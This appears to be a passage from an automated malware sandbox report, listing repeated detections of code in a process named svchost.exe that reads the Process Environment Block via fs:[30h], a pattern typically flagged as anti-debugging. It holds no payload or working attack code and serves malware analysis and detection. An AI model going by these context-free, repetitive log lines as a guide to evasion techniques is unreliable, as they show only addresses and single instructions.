                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D062D6 mov eax, dword ptr fs:[00000030h]3_2_03D062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C402E1 mov eax, dword ptr fs:[00000030h]3_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C402E1 mov eax, dword ptr fs:[00000030h]3_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C402E1 mov eax, dword ptr fs:[00000030h]3_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E284 mov eax, dword ptr fs:[00000030h]3_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E284 mov eax, dword ptr fs:[00000030h]3_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB0283 mov eax, dword ptr fs:[00000030h]3_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB0283 mov eax, dword ptr fs:[00000030h]3_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB0283 mov eax, dword ptr fs:[00000030h]3_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C402A0 mov eax, dword ptr fs:[00000030h]3_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C402A0 mov eax, dword ptr fs:[00000030h]3_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]3_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]3_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]3_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]3_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]3_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]3_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB8243 mov eax, dword ptr fs:[00000030h]3_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB8243 mov ecx, dword ptr fs:[00000030h]3_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2A250 mov eax, dword ptr fs:[00000030h]3_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C36259 mov eax, dword ptr fs:[00000030h]3_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CEA250 mov eax, dword ptr fs:[00000030h]3_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CEA250 mov eax, dword ptr fs:[00000030h]3_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C34260 mov eax, dword ptr fs:[00000030h]3_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C34260 mov eax, dword ptr fs:[00000030h]3_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C34260 mov eax, dword ptr fs:[00000030h]3_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2826B mov eax, dword ptr fs:[00000030h]3_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]3_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2823B mov eax, dword ptr fs:[00000030h]3_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF61C3 mov eax, dword ptr fs:[00000030h]3_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF61C3 mov eax, dword ptr fs:[00000030h]3_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]3_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D061E5 mov eax, dword ptr fs:[00000030h]3_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C601F8 mov eax, dword ptr fs:[00000030h]3_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C70185 mov eax, dword ptr fs:[00000030h]3_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CEC188 mov eax, dword ptr fs:[00000030h]3_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CEC188 mov eax, dword ptr fs:[00000030h]3_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD4180 mov eax, dword ptr fs:[00000030h]3_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD4180 mov eax, dword ptr fs:[00000030h]3_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]3_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]3_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]3_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]3_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2A197 mov eax, dword ptr fs:[00000030h]3_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2A197 mov eax, dword ptr fs:[00000030h]3_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2A197 mov eax, dword ptr fs:[00000030h]3_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]3_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]3_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC4144 mov ecx, dword ptr fs:[00000030h]3_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]3_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]3_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2C156 mov eax, dword ptr fs:[00000030h]3_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC8158 mov eax, dword ptr fs:[00000030h]3_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C36154 mov eax, dword ptr fs:[00000030h]3_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C36154 mov eax, dword ptr fs:[00000030h]3_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04164 mov eax, dword ptr fs:[00000030h]3_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04164 mov eax, dword ptr fs:[00000030h]3_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]3_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]3_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]3_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]3_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]3_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]3_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]3_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]3_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]3_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]3_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDA118 mov ecx, dword ptr fs:[00000030h]3_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDA118 mov eax, dword ptr fs:[00000030h]3_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDA118 mov eax, dword ptr fs:[00000030h]3_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDA118 mov eax, dword ptr fs:[00000030h]3_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF0115 mov eax, dword ptr fs:[00000030h]3_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C60124 mov eax, dword ptr fs:[00000030h]3_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB20DE mov eax, dword ptr fs:[00000030h]3_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]3_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C380E9 mov eax, dword ptr fs:[00000030h]3_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB60E0 mov eax, dword ptr fs:[00000030h]3_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]3_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C720F0 mov ecx, dword ptr fs:[00000030h]3_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3208A mov eax, dword ptr fs:[00000030h]3_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C280A0 mov eax, dword ptr fs:[00000030h]3_2_03C280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC80A8 mov eax, dword ptr fs:[00000030h]3_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF60B8 mov eax, dword ptr fs:[00000030h]3_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]3_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C32050 mov eax, dword ptr fs:[00000030h]3_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB6050 mov eax, dword ptr fs:[00000030h]3_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5C073 mov eax, dword ptr fs:[00000030h]3_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB4000 mov ecx, dword ptr fs:[00000030h]3_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]3_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]3_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]3_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]3_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]3_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]3_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]3_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]3_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]3_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]3_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]3_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]3_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2A020 mov eax, dword ptr fs:[00000030h]3_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2C020 mov eax, dword ptr fs:[00000030h]3_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC6030 mov eax, dword ptr fs:[00000030h]3_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]3_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB07C3 mov eax, dword ptr fs:[00000030h]3_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C527ED mov eax, dword ptr fs:[00000030h]3_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C527ED mov eax, dword ptr fs:[00000030h]3_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C527ED mov eax, dword ptr fs:[00000030h]3_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]3_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C347FB mov eax, dword ptr fs:[00000030h]3_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C347FB mov eax, dword ptr fs:[00000030h]3_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD678E mov eax, dword ptr fs:[00000030h]3_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C307AF mov eax, dword ptr fs:[00000030h]3_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE47A0 mov eax, dword ptr fs:[00000030h]3_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6674D mov esi, dword ptr fs:[00000030h]3_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6674D mov eax, dword ptr fs:[00000030h]3_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6674D mov eax, dword ptr fs:[00000030h]3_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C30750 mov eax, dword ptr fs:[00000030h]3_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBE75D mov eax, dword ptr fs:[00000030h]3_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72750 mov eax, dword ptr fs:[00000030h]3_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72750 mov eax, dword ptr fs:[00000030h]3_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB4755 mov eax, dword ptr fs:[00000030h]3_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C38770 mov eax, dword ptr fs:[00000030h]3_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]3_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6C700 mov eax, dword ptr fs:[00000030h]3_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C30710 mov eax, dword ptr fs:[00000030h]3_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C60710 mov eax, dword ptr fs:[00000030h]3_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6C720 mov eax, dword ptr fs:[00000030h]3_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6C720 mov eax, dword ptr fs:[00000030h]3_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6273C mov eax, dword ptr fs:[00000030h]3_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6273C mov ecx, dword ptr fs:[00000030h]3_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6273C mov eax, dword ptr fs:[00000030h]3_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAC730 mov eax, dword ptr fs:[00000030h]3_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]3_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]3_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB06F1 mov eax, dword ptr fs:[00000030h]3_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB06F1 mov eax, dword ptr fs:[00000030h]3_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C34690 mov eax, dword ptr fs:[00000030h]3_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C34690 mov eax, dword ptr fs:[00000030h]3_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]3_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C666B0 mov eax, dword ptr fs:[00000030h]3_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4C640 mov eax, dword ptr fs:[00000030h]3_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF866E mov eax, dword ptr fs:[00000030h]3_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF866E mov eax, dword ptr fs:[00000030h]3_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6A660 mov eax, dword ptr fs:[00000030h]3_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6A660 mov eax, dword ptr fs:[00000030h]3_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C62674 mov eax, dword ptr fs:[00000030h]3_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE609 mov eax, dword ptr fs:[00000030h]3_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]3_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]3_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]3_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]3_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]3_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]3_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]3_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72619 mov eax, dword ptr fs:[00000030h]3_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4E627 mov eax, dword ptr fs:[00000030h]3_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C66620 mov eax, dword ptr fs:[00000030h]3_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C68620 mov eax, dword ptr fs:[00000030h]3_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3262C mov eax, dword ptr fs:[00000030h]3_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E5CF mov eax, dword ptr fs:[00000030h]3_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E5CF mov eax, dword ptr fs:[00000030h]3_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C365D0 mov eax, dword ptr fs:[00000030h]3_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]3_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]3_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C325E0 mov eax, dword ptr fs:[00000030h]3_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6C5ED mov eax, dword ptr fs:[00000030h]3_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6C5ED mov eax, dword ptr fs:[00000030h]3_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C32582 mov eax, dword ptr fs:[00000030h]3_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C32582 mov ecx, dword ptr fs:[00000030h]3_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C64588 mov eax, dword ptr fs:[00000030h]3_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E59C mov eax, dword ptr fs:[00000030h]3_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB05A7 mov eax, dword ptr fs:[00000030h]3_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB05A7 mov eax, dword ptr fs:[00000030h]3_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB05A7 mov eax, dword ptr fs:[00000030h]3_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C545B1 mov eax, dword ptr fs:[00000030h]3_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C545B1 mov eax, dword ptr fs:[00000030h]3_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C38550 mov eax, dword ptr fs:[00000030h]3_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C38550 mov eax, dword ptr fs:[00000030h]3_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6656A mov eax, dword ptr fs:[00000030h]3_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6656A mov eax, dword ptr fs:[00000030h]3_2_03C6656A
